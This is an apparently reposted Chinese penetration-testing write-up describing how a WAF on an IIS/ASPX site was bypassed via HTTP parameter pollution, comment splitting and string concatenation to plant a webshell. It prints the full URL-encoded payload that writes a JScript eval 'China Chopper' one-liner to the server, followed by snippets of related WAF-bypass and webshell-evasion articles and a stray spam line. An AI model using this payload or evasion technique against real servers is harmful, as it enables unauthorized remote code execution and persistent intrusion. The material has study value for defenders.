<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰|記一次iis+aspx環境下利用http參數污染繞過waf

    VSole2022-07-22 08:41:33

    環境介紹

    Server: Microsoft-IIS/10.0

    X-AspNet-Version: 4.0.

    waf:某不知名waf

    漏洞點情況

    新建模板處,可以直接寫入內容到文件:

    但是一寫入正常的aspx語句就被攔截,連簡單的輸出語句都不行:

    bypass過程

    一開始也試過諸多繞過方法,包括各種常見編碼、chunked編碼等等,都不太行。

    然后嘗試了一下,看有沒有http參數污染(兩個code參數):

    訪問下生成的aspx文件:

    可以看到確實是可以的,但是中間有個逗號,我們該怎么利用來寫入aspx文件呢?

    比如一個最簡單的輸出hello world:

    <%@Page Language="C#"%> <% Response.Write("hello,world"); %>
    

    之前我們通過測試知道<% Response.Write("hello,world"); %>這個會被waf攔截,刪掉<%之后呢?

    可以看到成功上傳,那么思路就來了,將<%%>拆分就行,但是怎么讓服務器忽略掉那個逗號呢?

    自然是使用注釋。

    aspx是支持 “//”的注釋方式的,然后我們需要使用換行,把我們的內容換到下一行避免被注釋,于是:

    看看生成的文件:

    然后我們試著拆分前面被攔截的那個輸出hello world的語句:

    code=<%@Page Language="C#"%><% //&code=%0aResponse.Write("hello,world"); %>
    

    成功生成:

    Getshell

    經過了好一番嘗試,發現waf還過濾了Request等關鍵詞,eval()可以上傳,但是括號里面有內容比如eval(xxx)就不行。

    參考了這篇文章里的注釋符號:

    https://www.cnblogs.com/xiaozi/p/7566795.html

    將 eval(a)

    拆分為

    eval/*-/*-*/(a/*,*/)
    

    Request就直接用加號進行連接,比如:"Req"+"uest"

    最終結合hpp來利用,上傳菜刀一句話的payload為:

    code=<%@ Page Language = Jscript %><% //&code=%0avar+a%3d"ev"%2b"al"%2b"(Reque"%2b"st.Item[\"c"%2b"o\"],"%2b"\"uns"%2b"afe\")%3b"%3b eval/*-/*-*/(a/*&code=*/);%>
    

    這個生成的文件內容應該是:

    <%@ Page Language = Jscript %><%//,
    

    var a="ev"+"al"+"(Reque"+"st.Item["c"+"o"],"+""uns"+"afe");"; eval/-/-/(a/,*/);%>

    上傳:

    成功拿到一個菜刀shell,當然,菜刀因為waf的原因不能用:

    eval都行了,還怕拿不到shell?

    文章來源:烏云安全
    wafeval
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    前言 因為前陣子發表了一篇關于Thinkphp的文章到公眾號里面,南5給我扔過來一個站讓我試試。 初步想法 首先看了一下這個站,長這樣
    連上Webshell后發現執行不了任何命令,連常規的set、ver、whoami等命令都不行,EXE就更不用說了。執行時會卡一段時間,沒有回顯,也不顯示:拒絕訪問,說明不是360和火絨攔的。
    在測試漏洞賞金計劃時,我注意到我的html injectionpayload在將其發送到應用程序中反映的每個字段時都有效。然后,我第一次收到彈框的沖動讓我失望了。
    今天室友遇到一個好玩的網站,下面是一些嘗試繞過Waf進行XSS的記錄。首先該網站沒有對左右尖號和單雙引號做任何過濾或轉義。且有未知的waf或者其他阻止惡意訪問的手段。
    Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0. waf:某不知名waf
    文件上傳數據包解析 文件上傳實質上還是客戶端的POST請求,消息主體是一些上傳信息。前端上傳頁面需要指定 enctype為multipart/from-data才能正常上傳文件。 一個正常的文件上傳數據包大致如下:
    可以認為IAM分成兩類,一個是AWS提供的IAM,這是一個完整的身份管理系統,但AWS只提供了系統,基于該系統的配置及信息維護,由客戶完全負責。AWS 提供了虛擬網絡及其之上的VPC,子網,ACL,安全組等,客戶需要準確設計配置自己的網絡,以確保正確的隔離和防護。用戶控制權限的修改通常由特權用戶或者管理員組實現。
    (翻譯版)Numpy反序列化命令執行淺析代碼審計Python安全編碼和代碼審計Python代碼審計連載之一:CSRF?p=738Python代碼審計連載之三:Server Side Request?p=744Python代碼審計連載之四:Command Execution?p=747Dangerous Python Functions, Part 1Dangerous Python Functions, Part 2Dangerous Python Functions, Part 3記一下PythonWeb代碼審計應該注意的地方廖新喜大佬的python代碼審計工具來自openstack安全團隊的python代碼靜態審計工具來自openstack安全團隊的python代碼靜態審計工具2代碼審計工具pytxfkxfk的python自動化代碼審計?
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,弱口令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    傳統的php免殺不用多說了 無非就是各種變形和外部參數獲取,對于一些先進的waf和防火墻來說,不論如何解析最終都會到達命令執行的地方,但是如果語法報錯的話,就可能導致解析失敗了,這里簡單說幾個利用php版本來進行語義出錯的php命令執行方式。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类